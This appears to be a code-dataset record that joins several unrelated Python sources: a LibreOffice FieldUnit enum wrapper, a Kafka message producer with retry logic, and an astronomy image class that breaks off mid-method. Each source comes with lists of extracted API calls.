] | [((2308, 2386), 'cv2.resize', 'cv2.resize', (['image_to_resize', '(size[1], size[0])'], {'interpolation': 'cv2.INTER_CUBIC'}), '(image_to_resize, (size[1], size[0]), interpolation=cv2.INTER_CUBIC)\n', (2318, 2386), False, 'import cv2\n'), ((3833, 3857), 'numpy.array', 'np.array', (['max_crop_noise'], {}), '(max_crop_noise)\n', (3841, 3857), True, 'import numpy as np\n'), ((3886, 3915), 'numpy.zeros', 'np.zeros', (['(2)'], {'dtype': 'np.float32'}), '(2, dtype=np.float32)\n', (3894, 3915), True, 'import numpy as np\n'), ((4423, 4440), 'src.constants.VIEWS.is_cc', 'VIEWS.is_cc', (['view'], {}), '(view)\n', (4434, 4440), False, 'from src.constants import VIEWS\n'), ((7323, 7375), 'numpy.array', 'np.array', (['(top, bottom, left, right)'], {'dtype': 'np.int32'}), '((top, bottom, left, right), dtype=np.int32)\n', (7331, 7375), True, 'import numpy as np\n'), ((8045, 8093), 'numpy.round', 'np.round', (['(max_crop_noise * crop_noise_multiplier)'], {}), '(max_crop_noise * crop_noise_multiplier)\n', (8053, 8093), True, 'import numpy as np\n'), ((8111, 8201), 'numpy.array', 'np.array', (['(crop_noise[0], crop_noise[0], crop_noise[1], crop_noise[1])'], {'dtype': 'np.int32'}), '((crop_noise[0], crop_noise[0], crop_noise[1], crop_noise[1]),\n dtype=np.int32)\n', (8119, 8201), True, 'import numpy as np\n'), ((9667, 9826), 'numpy.array', 'np.array', (['(max_crop_size_vertical_noise, max_crop_size_vertical_noise,\n max_crop_size_horizontal_noise, max_crop_size_horizontal_noise)'], {'dtype': 'np.int32'}), '((max_crop_size_vertical_noise, max_crop_size_vertical_noise,\n max_crop_size_horizontal_noise, max_crop_size_horizontal_noise), dtype=\n np.int32)\n', (9675, 9826), True, 'import numpy as np\n'), ((9906, 9959), 'numpy.round', 'np.round', (['(max_crop_size_noise * size_noise_multiplier)'], {}), '(max_crop_size_noise * size_noise_multiplier)\n', (9914, 9959), True, 'import numpy as np\n'), ((9977, 10013), 'numpy.array', 'np.array', (['size_noise'], {'dtype': 'np.int32'}), 
'(size_noise, dtype=np.int32)\n', (9985, 10013), True, 'import numpy as np\n'), ((11191, 11215), 'numpy.expand_dims', 'np.expand_dims', (['image', '(2)'], {}), '(image, 2)\n', (11205, 11215), True, 'import numpy as np\n'), ((2519, 2551), 'numpy.expand_dims', 'np.expand_dims', (['image_resized', '(2)'], {}), '(image_resized, 2)\n', (2533, 2551), True, 'import numpy as np\n'), ((4980, 4998), 'src.constants.VIEWS.is_mlo', 'VIEWS.is_mlo', (['view'], {}), '(view)\n', (4992, 4998), False, 'from src.constants import VIEWS\n'), ((6014, 6136), 'numpy.zeros', 'np.zeros', (['(image.shape[0] + pad_y_top + pad_y_bottom, image.shape[1] + pad_x_right,\n image.shape[2])'], {'dtype': 'image.dtype'}), '((image.shape[0] + pad_y_top + pad_y_bottom, image.shape[1] +\n pad_x_right, image.shape[2]), dtype=image.dtype)\n', (6022, 6136), True, 'import numpy as np\n'), ((6659, 6691), 'numpy.abs', 'np.abs', (['crop_noise_multiplier[0]'], {}), '(crop_noise_multiplier[0])\n', (6665, 6691), True, 'import numpy as np\n'), ((7046, 7078), 'numpy.abs', 'np.abs', (['crop_noise_multiplier[1]'], {}), '(crop_noise_multiplier[1])\n', (7052, 7078), True, 'import numpy as np\n'), ((9333, 9396), 'numpy.round', 'np.round', (['(max_crop_size_noise * (input_size[1] / input_size[0]))'], {}), '(max_crop_size_noise * (input_size[1] / input_size[0]))\n', (9341, 9396), True, 'import numpy as np\n'), ((11274, 11328), 'numpy.concatenate', 'np.concatenate', (['[joint_image, auxiliary_image]'], {'axis': '(2)'}), '([joint_image, auxiliary_image], axis=2)\n', (11288, 11328), True, 'import numpy as np\n'), ((9476, 9539), 'numpy.round', 'np.round', (['(max_crop_size_noise * (input_size[0] / input_size[1]))'], {}), '(max_crop_size_noise * (input_size[0] / input_size[1]))\n', (9484, 9539), True, 'import numpy as np\n'), ((6833, 6865), 'numpy.abs', 'np.abs', (['crop_noise_multiplier[0]'], {}), '(crop_noise_multiplier[0])\n', (6839, 6865), True, 'import numpy as np\n'), ((7225, 7257), 'numpy.abs', 'np.abs', 
(['crop_noise_multiplier[1]'], {}), '(crop_noise_multiplier[1])\n', (7231, 7257), True, 'import numpy as np\n')] |
# coding: utf-8
#
# Copyright 2022 :Barry-Thomas-Paul: Moss
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Const Class
# this is a auto generated file generated by Cheetah
# Libre Office Version: 7.3
# Namespace: com.sun.star.awt
from enum import IntEnum
from typing import TYPE_CHECKING
from ooo.oenv.env_const import UNO_ENVIRONMENT, UNO_RUNTIME
# Whether the real UNO runtime is available; decides between the dynamic
# and the static definition of FieldUnitEnum below.
_DYNAMIC = False
if (not TYPE_CHECKING) and UNO_RUNTIME and UNO_ENVIRONMENT:
    _DYNAMIC = True
if not TYPE_CHECKING and _DYNAMIC:
    # Running inside LibreOffice: pull the live constant group from UNO and
    # build the enum from whatever members the runtime actually exposes.
    from com.sun.star.awt import FieldUnit as FieldUnit
    if hasattr(FieldUnit, '_constants') and isinstance(FieldUnit._constants, dict):
        # Tag the constant group with its namespace metadata for ooouno tooling.
        FieldUnit._constants['__ooo_ns__'] = 'com.sun.star.awt'
        FieldUnit._constants['__ooo_full_ns__'] = 'com.sun.star.awt.FieldUnit'
        FieldUnit._constants['__ooo_type_name__'] = 'const'
    def build_enum():
        # Build FieldUnitEnum dynamically from the non-callable, non-dunder
        # attributes of the UNO FieldUnit constant group.
        global FieldUnitEnum
        ls = [f for f in dir(FieldUnit) if not callable(getattr(FieldUnit, f)) and not f.startswith('__')]
        _dict = {}
        for name in ls:
            _dict[name] = getattr(FieldUnit, name)
        FieldUnitEnum = IntEnum('FieldUnitEnum', _dict)
    build_enum()
else:
    # No UNO runtime (or only type checking): fall back to the statically
    # generated FieldUnit mirror shipped with this package.
    from ...lo.awt.field_unit import FieldUnit as FieldUnit
    class FieldUnitEnum(IntEnum):
        """
        Enum of Const Class FieldUnit

        specifies attributes for the MetricField map units.

        IMPORTANT: These constants have to be disjunct with constants in util/MeasureUnit.
        """
        FUNIT_NONE = FieldUnit.FUNIT_NONE
        FUNIT_MM = FieldUnit.FUNIT_MM
        FUNIT_CM = FieldUnit.FUNIT_CM
        FUNIT_M = FieldUnit.FUNIT_M
        FUNIT_KM = FieldUnit.FUNIT_KM
        FUNIT_TWIP = FieldUnit.FUNIT_TWIP
        FUNIT_POINT = FieldUnit.FUNIT_POINT
        FUNIT_PICA = FieldUnit.FUNIT_PICA
        FUNIT_INCH = FieldUnit.FUNIT_INCH
        FUNIT_FOOT = FieldUnit.FUNIT_FOOT
        FUNIT_MILE = FieldUnit.FUNIT_MILE
        FUNIT_CUSTOM = FieldUnit.FUNIT_CUSTOM
        FUNIT_PERCENT = FieldUnit.FUNIT_PERCENT
        FUNIT_100TH_MM = FieldUnit.FUNIT_100TH_MM
__all__ = ['FieldUnit', 'FieldUnitEnum']
| [
"enum.IntEnum"
] | [((1604, 1635), 'enum.IntEnum', 'IntEnum', (['"""FieldUnitEnum"""', '_dict'], {}), "('FieldUnitEnum', _dict)\n", (1611, 1635), False, 'from enum import IntEnum\n')] |
# -*- coding: utf-8 -*-
# Copyright 2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from __future__ import unicode_literals
import time
from collections import defaultdict
from collections import namedtuple
from contextlib import contextmanager
from cached_property import cached_property
from kafka import create_message
from kafka import KafkaClient
from kafka.common import ProduceRequest
from data_pipeline._position_data_tracker import PositionDataTracker
from data_pipeline._producer_retry import RetryHandler
from data_pipeline._retry_util import ExpBackoffPolicy
from data_pipeline._retry_util import MaxRetryError
from data_pipeline._retry_util import Predicate
from data_pipeline._retry_util import retry_on_condition
from data_pipeline._retry_util import RetryPolicy
from data_pipeline.config import get_config
from data_pipeline.envelope import Envelope
# Pairs a message with the envelope used to pack it, so the two can be handed
# to the module-level `_prepare` (which must be picklable for multiprocessing)
# as a single argument.
_EnvelopeAndMessage = namedtuple("_EnvelopeAndMessage", ["envelope", "message"])
# Shared logger taken from the data_pipeline configuration.
logger = get_config().logger
# prepare needs to be in the module top level so it can be serialized for
# multiprocessing
def _prepare(envelope_and_message):
    """Pack a message into a Kafka message object ready for publication.

    Lives at module level (rather than as a method) so it can be pickled
    for multiprocessing.

    Args:
        envelope_and_message (_EnvelopeAndMessage): the envelope/message
            pair to pack; the message's encoded keys, when present, become
            the Kafka message key.

    Returns:
        The message created by ``kafka.create_message``.

    Raises:
        Exception: whatever packing/encoding raises is logged and re-raised.
    """
    try:
        kwargs = {}
        if envelope_and_message.message.keys:
            kwargs['key'] = envelope_and_message.message.encoded_keys
        return create_message(
            envelope_and_message.envelope.pack(envelope_and_message.message),
            **kwargs
        )
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit are
        # not intercepted here; genuine packing failures are still logged and
        # re-raised for the caller to handle.
        logger.exception('Prepare failed')
        raise
class KafkaProducer(object):
    """The KafkaProducer deals with buffering messages that need to be published
    into Kafka, preparing them for publication, and ultimately publishing them.

    Args:
        producer_position_callback (function): The producer position callback
            is called when the KafkaProducer is instantiated, and every time
            messages are published to notify the producer of current position
            information of successfully published messages.
        dry_run (Optional[bool]): When dry_run mode is on, the producer won't
            talk to real KafKa topic, nor to real Schematizer.  Default to False.
    """
    @cached_property
    def envelope(self):
        # Built lazily, once per producer; used to pack every outgoing message.
        return Envelope()
    def __init__(self, producer_position_callback, dry_run=False):
        self.producer_position_callback = producer_position_callback
        self.dry_run = dry_run
        self.kafka_client = KafkaClient(get_config().cluster_config.broker_list)
        self.position_data_tracker = PositionDataTracker()
        # Initializes start_time, message_buffer and message_buffer_size.
        self._reset_message_buffer()
        self.skip_messages_with_pii = get_config().skip_messages_with_pii
        # Exponential backoff (with jitter) bounded by the configured retry count.
        self._publish_retry_policy = RetryPolicy(
            ExpBackoffPolicy(with_jitter=True),
            max_retry_count=get_config().producer_max_publish_retry_count
        )
        self._automatic_flush_enabled = True
    @contextmanager
    def disable_automatic_flushing(self):
        """Prevents the producer from flushing automatically (e.g. for timeouts
        or batch size) while the context manager is open.
        """
        try:
            self._automatic_flush_enabled = False
            yield
        finally:
            self._automatic_flush_enabled = True
    def wake(self):
        """Should be called periodically if we're not otherwise waking up by
        publishing, to ensure that messages are actually published.
        """
        # if we haven't woken up in a while, we may need to flush messages
        self._flush_if_necessary()
    def publish(self, message):
        """Buffer a message for publication, flushing the buffer if the
        time or size threshold has been reached.

        Messages containing PII are dropped (with an info log) when the
        configuration says to skip them.
        """
        if message.contains_pii and self.skip_messages_with_pii:
            logger.info(
                "Skipping a PII message - "
                "uuid hex: {0}, "
                "schema_id: {1}, "
                "timestamp: {2}, "
                "type: {3}".format(
                    message.uuid_hex,
                    message.schema_id,
                    message.timestamp,
                    message.message_type.name
                )
            )
            return
        self._add_message_to_buffer(message)
        self.position_data_tracker.record_message_buffered(message)
        self._flush_if_necessary()
    def flush_buffered_messages(self):
        """Publish everything currently buffered (or pretend to, in dry-run
        mode) and reset the buffer."""
        produce_method = (self._publish_produce_requests_dry_run
                          if self.dry_run else self._publish_produce_requests)
        produce_method(self._generate_produce_requests())
        self._reset_message_buffer()
    def close(self):
        """Flush any remaining messages and close the Kafka connection."""
        self.flush_buffered_messages()
        self.kafka_client.close()
    def _publish_produce_requests(self, requests):
        """It will try to publish all the produce requests for topics, and
        retry a number of times until either all the requests are successfully
        published or it can no longer retry, in which case, the exception will
        be thrown.

        Each time the requests that are successfully published in the previous
        round will be removed from the requests and won't be published again.
        """
        unpublished_requests = list(requests)
        retry_handler = RetryHandler(self.kafka_client, unpublished_requests)
        def has_requests_to_be_sent():
            # Retry condition: keep going while anything remains unsent.
            return bool(retry_handler.requests_to_be_sent)
        retry_handler = retry_on_condition(
            retry_policy=self._publish_retry_policy,
            retry_conditions=[Predicate(has_requests_to_be_sent)],
            func_to_retry=self._publish_requests,
            use_previous_result_as_param=True,
            retry_handler=retry_handler
        )
        if retry_handler.has_unpublished_request:
            raise MaxRetryError(last_result=retry_handler)
    def _publish_requests(self, retry_handler):
        """Main function to publish message requests. This function is wrapped
        with retry function and will be retried based on specified retry policy

        Args:
            retry_handler: :class:`data_pipeline._producer_retry.RetryHandler`
                that determines which messages should be retried next time.
        """
        if not retry_handler.requests_to_be_sent:
            return retry_handler
        responses = self._try_send_produce_requests(
            retry_handler.requests_to_be_sent
        )
        retry_handler.update_requests_to_be_sent(
            responses,
            self.position_data_tracker.topic_to_kafka_offset_map
        )
        self._record_success_requests(retry_handler.success_topic_stats_map)
        return retry_handler
    def _try_send_produce_requests(self, requests):
        # Either it throws exceptions and none of them succeeds, or it returns
        # responses of all the requests (success or fail response).
        try:
            return self.kafka_client.send_produce_request(
                payloads=requests,
                acks=get_config().kafka_client_ack_count,
                fail_on_error=False
            )
        except Exception:
            # Exceptions like KafkaUnavailableError, LeaderNotAvailableError,
            # UnknownTopicOrPartitionError, etc., are not controlled by
            # `fail_on_error` flag and could be thrown from the kafka client,
            # and fail all the requests.  We will retry all the requests until
            # either all of them are successfully published or it exceeds the
            # maximum retry criteria.
            return []
    def _record_success_requests(self, success_topic_stats_map):
        """Record published offsets for fully-successful topics and drop
        their messages from the buffer."""
        # NOTE: iteritems() means this code targets Python 2.
        for topic_partition, stats in success_topic_stats_map.iteritems():
            topic = topic_partition.topic_name
            assert stats.message_count == len(self.message_buffer[topic])
            self.position_data_tracker.record_messages_published(
                topic=topic,
                offset=stats.original_offset,
                message_count=stats.message_count
            )
            self.message_buffer.pop(topic)
    def _publish_produce_requests_dry_run(self, requests):
        # Dry-run path: record positions without touching Kafka.
        for request in requests:
            self._publish_single_request_dry_run(request)
    def _publish_single_request_dry_run(self, request):
        topic = request.topic
        message_count = len(request.messages)
        # Offset -1 marks a dry-run (never actually published) position.
        self.position_data_tracker.record_messages_published(
            topic,
            -1,
            message_count
        )
    def _is_ready_to_flush(self):
        # Flush when automatic flushing is on and either the time limit has
        # elapsed since the last reset or the buffer has hit its size cap.
        time_limit = get_config().kafka_producer_flush_time_limit_seconds
        return (self._automatic_flush_enabled and (
            (time.time() - self.start_time) >= time_limit or
            self.message_buffer_size >= get_config().kafka_producer_buffer_size
        ))
    def _flush_if_necessary(self):
        if self._is_ready_to_flush():
            self.flush_buffered_messages()
    def _add_message_to_buffer(self, message):
        topic = message.topic
        # Pack/encode eagerly so flush only has to build produce requests.
        message = self._prepare_message(message)
        self.message_buffer[topic].append(message)
        self.message_buffer_size += 1
    def _generate_produce_requests(self):
        return [
            ProduceRequest(topic=topic, partition=0, messages=messages)
            for topic, messages in self._generate_prepared_topic_and_messages()
        ]
    def _generate_prepared_topic_and_messages(self):
        # NOTE: iteritems() means this code targets Python 2.
        return self.message_buffer.iteritems()
    def _prepare_message(self, message):
        return _prepare(_EnvelopeAndMessage(envelope=self.envelope, message=message))
    def _reset_message_buffer(self):
        # Report position data before discarding the buffer, but only when
        # something was actually buffered (or on first initialization).
        if not hasattr(self, 'message_buffer_size') or self.message_buffer_size > 0:
            self.producer_position_callback(self.position_data_tracker.get_position_data())
        self.start_time = time.time()
        self.message_buffer = defaultdict(list)
        self.message_buffer_size = 0
class LoggingKafkaProducer(KafkaProducer):
    """A KafkaProducer that logs the progress of every publish cycle."""

    def _publish_produce_requests(self, requests):
        """Publish the requests, logging start, success, and failure."""
        flush_message = (
            "Flushing buffered messages - requests={0}, messages={1}".format(
                len(requests), self.message_buffer_size
            )
        )
        logger.info(flush_message)
        try:
            super(LoggingKafkaProducer, self)._publish_produce_requests(requests)
            logger.info("All messages published successfully")
        except MaxRetryError as e:
            failure_message = "Failed to publish all produce requests. {0}".format(
                repr(e)
            )
            logger.exception(failure_message)
            raise

    def _reset_message_buffer(self):
        """Log the buffer reset before delegating to the base class."""
        logger.info("Resetting message buffer for success requests.")
        super(LoggingKafkaProducer, self)._reset_message_buffer()

    def _publish_single_request_dry_run(self, request):
        """Record the dry-run publish, then log what would have been sent."""
        super(LoggingKafkaProducer, self)._publish_single_request_dry_run(request)
        dry_run_message = "dry_run mode: Would have published {0} messages to {1}".format(
            len(request.messages),
            request.topic
        )
        logger.debug(dry_run_message)
| [
"data_pipeline._retry_util.MaxRetryError",
"collections.namedtuple",
"kafka.common.ProduceRequest",
"data_pipeline._retry_util.Predicate",
"data_pipeline.config.get_config",
"collections.defaultdict",
"data_pipeline._position_data_tracker.PositionDataTracker",
"data_pipeline._retry_util.ExpBackoffPoli... | [((1446, 1504), 'collections.namedtuple', 'namedtuple', (['"""_EnvelopeAndMessage"""', "['envelope', 'message']"], {}), "('_EnvelopeAndMessage', ['envelope', 'message'])\n", (1456, 1504), False, 'from collections import namedtuple\n'), ((1514, 1526), 'data_pipeline.config.get_config', 'get_config', ([], {}), '()\n', (1524, 1526), False, 'from data_pipeline.config import get_config\n'), ((2742, 2752), 'data_pipeline.envelope.Envelope', 'Envelope', ([], {}), '()\n', (2750, 2752), False, 'from data_pipeline.envelope import Envelope\n'), ((3039, 3060), 'data_pipeline._position_data_tracker.PositionDataTracker', 'PositionDataTracker', ([], {}), '()\n', (3058, 3060), False, 'from data_pipeline._position_data_tracker import PositionDataTracker\n'), ((5633, 5686), 'data_pipeline._producer_retry.RetryHandler', 'RetryHandler', (['self.kafka_client', 'unpublished_requests'], {}), '(self.kafka_client, unpublished_requests)\n', (5645, 5686), False, 'from data_pipeline._producer_retry import RetryHandler\n'), ((10198, 10209), 'time.time', 'time.time', ([], {}), '()\n', (10207, 10209), False, 'import time\n'), ((10240, 10257), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (10251, 10257), False, 'from collections import defaultdict\n'), ((3136, 3148), 'data_pipeline.config.get_config', 'get_config', ([], {}), '()\n', (3146, 3148), False, 'from data_pipeline.config import get_config\n'), ((3234, 3268), 'data_pipeline._retry_util.ExpBackoffPolicy', 'ExpBackoffPolicy', ([], {'with_jitter': '(True)'}), '(with_jitter=True)\n', (3250, 3268), False, 'from data_pipeline._retry_util import ExpBackoffPolicy\n'), ((6166, 6206), 'data_pipeline._retry_util.MaxRetryError', 'MaxRetryError', ([], {'last_result': 'retry_handler'}), '(last_result=retry_handler)\n', (6179, 6206), False, 'from data_pipeline._retry_util import MaxRetryError\n'), ((8915, 8927), 'data_pipeline.config.get_config', 'get_config', ([], {}), '()\n', 
(8925, 8927), False, 'from data_pipeline.config import get_config\n'), ((9578, 9637), 'kafka.common.ProduceRequest', 'ProduceRequest', ([], {'topic': 'topic', 'partition': '(0)', 'messages': 'messages'}), '(topic=topic, partition=0, messages=messages)\n', (9592, 9637), False, 'from kafka.common import ProduceRequest\n'), ((2961, 2973), 'data_pipeline.config.get_config', 'get_config', ([], {}), '()\n', (2971, 2973), False, 'from data_pipeline.config import get_config\n'), ((3298, 3310), 'data_pipeline.config.get_config', 'get_config', ([], {}), '()\n', (3308, 3310), False, 'from data_pipeline.config import get_config\n'), ((5914, 5948), 'data_pipeline._retry_util.Predicate', 'Predicate', (['has_requests_to_be_sent'], {}), '(has_requests_to_be_sent)\n', (5923, 5948), False, 'from data_pipeline._retry_util import Predicate\n'), ((7374, 7386), 'data_pipeline.config.get_config', 'get_config', ([], {}), '()\n', (7384, 7386), False, 'from data_pipeline.config import get_config\n'), ((9033, 9044), 'time.time', 'time.time', ([], {}), '()\n', (9042, 9044), False, 'import time\n'), ((9121, 9133), 'data_pipeline.config.get_config', 'get_config', ([], {}), '()\n', (9131, 9133), False, 'from data_pipeline.config import get_config\n')] |
import numpy as np
import matplotlib.pyplot as plt
from astropy import units as u
from astropy.coordinates import SkyCoord
from astropy.io import fits
from astropy.nddata import CCDData
from astropy.nddata import Cutout2D
from astropy.stats import sigma_clipped_stats
from astropy.wcs.utils import proj_plane_pixel_scales
from .plot import plot_image
from .instrument_info import get_zp
from .utils import get_wcs_rotation
from astropy.visualization import simple_norm, make_lupton_rgb
from .math import Maskellipse,polynomialfit,cross_match
from photutils.segmentation import deblend_sources
from astropy.convolution import Gaussian2DKernel
from astropy.stats import gaussian_fwhm_to_sigma
from photutils import detect_threshold
from photutils import detect_sources
from photutils import source_properties
from astropy.table import Table, Column, join, join_skycoord
from astropy.wcs import WCS
from astropy.nddata import NDData
from photutils.psf import extract_stars
import matplotlib.colors as colors
from photutils import EPSFBuilder
# Names exported by `from <this module> import *`.
__all__ = ['image', 'image_atlas']
class image(object):
    '''
    A single image object.

    Functions
    ---------
    * Read from fits file use CCDData.
    * get_size : Get the image size.
    * plot : Plot the image.
    * sigma_clipped_stats : Calculate the basic statistics of the image.
    * set_data : Load from numpy array.
    * set_mask : Set image mask.
    * set_pixel_scales : Set the pixel scales along two axes.
    * set_zero_point : Set magnitude zero point.
    '''
    def __init__(self, filename=None, hdu=0, unit=None, zero_point=None,
                 pixel_scales=None, wcs_rotation=None, mask=None, verbose=True):
        '''
        Parameters
        ----------
        filename (optional) : string
            FITS file name of the image.
        hdu : int (default: 0)
            The number of extension to load from the FITS file.
        unit (optional) : string
            Unit of the image flux for CCDData.
        zero_point (optional) : float
            Magnitude zero point.
        pixel_scales (optional) : tuple
            Pixel scales along the first and second directions, units: arcsec.
        wcs_rotation (optional) : float
            WCS rotation, east of north, units: radian.
        mask (optional) : 2D bool array
            The image mask.
        verbose : bool (default: True)
            Print out auxiliary data.
        '''
        if filename is None:
            self.data = None
        else:
            self.data = CCDData.read(filename, hdu=hdu, unit=unit, mask=mask)
            if self.data.wcs and (pixel_scales is None):
                pixel_scales = proj_plane_pixel_scales(self.data.wcs) * u.degree.to('arcsec')

        self.zero_point = zero_point
        if pixel_scales is None:
            self.pixel_scales = None
        else:
            self.pixel_scales = (pixel_scales[0]*u.arcsec, pixel_scales[1]*u.arcsec)

        # Bug fix: guard against `self.data` being None (no filename given);
        # previously `self.data.wcs` raised AttributeError in that case.
        if (self.data is not None) and self.data.wcs and (wcs_rotation is None):
            self.wcs_rotation = get_wcs_rotation(self.data.wcs)
        elif wcs_rotation is not None:
            self.wcs_rotation = wcs_rotation * u.radian
        else:
            self.wcs_rotation = None
        self.sources_catalog = None
        self.sigma_image = None
        self.sources_skycord = None
        self.ss_data = None
        self.PSF = None

    # Note: `get_size` was previously defined twice with identical bodies;
    # the duplicate definition has been removed.
    def get_size(self, units='pixel'):
        '''
        Get the size of the image.

        Parameters
        ----------
        units : string
            Units of the size ('pixel' or an angular unit understood by astropy).

        Returns
        -------
        x, y : float
            Size along X and Y axes.
        '''
        nrow, ncol = self.data.shape
        if units == 'pixel':
            x = ncol
            y = nrow
        else:
            x = ncol * self.pixel_scales[0].to(units).value
            y = nrow * self.pixel_scales[1].to(units).value
        return (x, y)

    def get_data_info(self):
        '''
        Data information to generate model image.

        Returns
        -------
        d : dict
            shape : (ny, nx)
                Image array shape.
            pixel_scale : (pixelscale_x, pixelscale_y), default units: arcsec
                Pixel scales.
            wcs_rotation : angle, default units: radian
                WCS rotation, east of north.
        '''
        # Bug fix: the attribute is `pixel_scales`; `self.pixel_scale` never
        # existed and raised AttributeError.
        d = dict(shape=self.data.shape,
                 pixel_scale=self.pixel_scales,
                 wcs_rotation=self.wcs_rotation)
        return d

    def sigma_clipped_stats(self, **kwargs):
        '''
        Run astropy.stats.sigma_clipped_stats to get the basic statistics of
        the image.

        Parameters
        ----------
        All of the parameters go to astropy.stats.sigma_clipped_stats().

        Returns
        -------
        mean, median, stddev : float
            The mean, median, and standard deviation of the sigma-clipped data.
        '''
        return sigma_clipped_stats(self.data.data, mask=self.data.mask, **kwargs)

    def plot(self, stretch='asinh', units='arcsec', vmin=None, vmax=None,
             a=None, ax=None, plain=False, **kwargs):
        '''
        Plot an image.

        Parameters
        ----------
        stretch : string (default: 'asinh')
            Choice of stretch: asinh, linear, sqrt, log.
        units : string (default: 'arcsec')
            Units of pixel scale.
        vmin (optional) : float
            Minimal value of imshow.
        vmax (optional) : float
            Maximal value of imshow.
        a (optional) : float
            Scale factor of some stretch function.
        ax (optional) : matplotlib.Axis
            Axis to plot the image.
        plain : bool (default: False)
            If False, tune the image.
        **kwargs : Additional parameters goes into plt.imshow()

        Returns
        -------
        ax : matplotlib.Axis
            Axis to plot the image.
        '''
        assert self.data is not None, 'Set data first!'
        ax = plot_image(self.data, self.pixel_scales, stretch=stretch,
                        units=units, vmin=vmin, vmax=vmax, a=a, ax=ax,
                        plain=plain, **kwargs)
        if plain is False:
            ax.set_xlabel(r'$\Delta X$ ({0})'.format(units), fontsize=24)
            ax.set_ylabel(r'$\Delta Y$ ({0})'.format(units), fontsize=24)
        return ax

    def plot_direction(self, ax, xy=(0, 0), len_E=None, len_N=None, color='k', fontsize=20,
                       linewidth=2, frac_len=0.1, units='arcsec', backextend=0.05):
        '''
        Plot the direction arrow. Only applied to plots using WCS.

        Parameters
        ----------
        ax : Axis
            Axis to plot the direction.
        xy : (x, y)
            Coordinate of the origin of the arrows.
        len_E, len_N (optional) : float
            Length of the E and N arrows, units: pixel.  Default is
            `frac_len` of the current axis width.
        units: string (default: arcsec)
            Units of xy.
        '''
        xlim = ax.get_xlim()
        len_total = np.abs(xlim[1] - xlim[0])
        pixelscale = self.pixel_scales[0].to('degree').value
        if len_E is None:
            len_E = len_total * frac_len / pixelscale
        if len_N is None:
            len_N = len_total * frac_len / pixelscale

        wcs = self.data.wcs
        header = wcs.to_header()
        d_ra = len_E * pixelscale
        d_dec = len_N * pixelscale
        # Project short steps east and north from the reference point into
        # pixel space to find the on-sky arrow directions.
        ra = [header['CRVAL1'], header['CRVAL1']+d_ra, header['CRVAL1']]
        dec = [header['CRVAL2'], header['CRVAL2'], header['CRVAL2']+d_dec]
        ra_pix, dec_pix = wcs.all_world2pix(ra, dec, 1)
        d_arrow1 = [ra_pix[1]-ra_pix[0], dec_pix[1]-dec_pix[0]]
        d_arrow2 = [ra_pix[2]-ra_pix[0], dec_pix[2]-dec_pix[0]]
        l_arrow1 = np.sqrt(d_arrow1[0]**2 + d_arrow1[1]**2)
        l_arrow2 = np.sqrt(d_arrow2[0]**2 + d_arrow2[1]**2)
        d_arrow1 = np.array(d_arrow1) / l_arrow1 * len_E * pixelscale
        d_arrow2 = np.array(d_arrow2) / l_arrow2 * len_N * pixelscale

        def sign_2_align(sign):
            '''
            Determine the text alignment from the arrow direction sign.
            '''
            if sign[0] < 0:
                ha = 'right'
            else:
                ha = 'left'
            if sign[1] < 0:
                va = 'top'
            else:
                va = 'bottom'
            return ha, va
        ha1, va1 = sign_2_align(np.sign(d_arrow1))
        ha2, va2 = sign_2_align(np.sign(d_arrow2))

        xy_e = (xy[0] - d_arrow1[0] * backextend, xy[1] - d_arrow1[1] * backextend)
        ax.annotate('E', xy=xy_e, xycoords='data', fontsize=fontsize,
                    xytext=(d_arrow1[0]+xy[0], d_arrow1[1]+xy[1]), color=color,
                    arrowprops=dict(color=color, arrowstyle="<-", lw=linewidth),
                    ha=ha1, va=va1)
        xy_n = (xy[0] - d_arrow2[0] * backextend, xy[1] - d_arrow2[1] * backextend)
        ax.annotate('N', xy=xy_n, xycoords='data', fontsize=fontsize,
                    xytext=(d_arrow2[0]+xy[0], d_arrow2[1]+xy[1]), color=color,
                    arrowprops=dict(color=color, arrowstyle="<-", lw=linewidth),
                    ha=ha2, va=va2)

    def set_data(self, data, unit):
        '''
        Load image data from a numpy array.

        Parameters
        ----------
        data : 2D array
            Image data.
        unit : string
            Unit for CCDData.
        '''
        self.data = CCDData(data, unit=unit)

    def source_detection_individual(self, psfFWHM, nsigma=3.0, sc_key=''):
        '''
        Detect sources in this image with photutils and store the catalog.

        Parameters
        ----------
        psfFWHM : float
            FWHM of the imaging point spread function.
        nsigma : float
            Source detection threshold.
        sc_key : str or int
            Suffix used to label the index column of the sky-coordinate table.
        '''
        data = np.array(self.data.copy())
        psfFWHMpix = psfFWHM / self.pixel_scales[0].value
        thresholder = detect_threshold(data, nsigma=nsigma)
        sigma = psfFWHMpix * gaussian_fwhm_to_sigma
        kernel = Gaussian2DKernel(sigma, x_size=5, y_size=5)
        kernel.normalize()
        segm = detect_sources(data, thresholder, npixels=5, filter_kernel=kernel)
        props = source_properties(data, segm)
        tab = Table(props.to_table())
        self.sources_catalog = tab
        srcPstradec = self.data.wcs.all_pix2world(tab['xcentroid'], tab['ycentroid'], 1)
        sc = SkyCoord(srcPstradec[0], srcPstradec[1], unit='deg')
        sctab = Table([sc, np.arange(len(sc))], names=['sc', 'sloop_{0}'.format(sc_key)])
        self.sources_skycord = sctab

    def make_mask(self, sources=None, magnification=3.):
        '''
        Make a mask for the extension by masking elliptical regions around
        detected sources (plus NaN/Inf pixels).

        Parameters
        ----------
        sources (optional) : Table
            A to-be-masked source table (can be generated from photutils
            source detection).  If None, the image's own source catalog is used.
        magnification : float
            Expansion factor applied to the source ellipses when masking.
        '''
        mask = np.zeros_like(self.data, dtype=bool)
        mask[np.isnan(self.data)] = True
        mask[np.isinf(self.data)] = True
        if sources is None:
            sources = self.sources_catalog
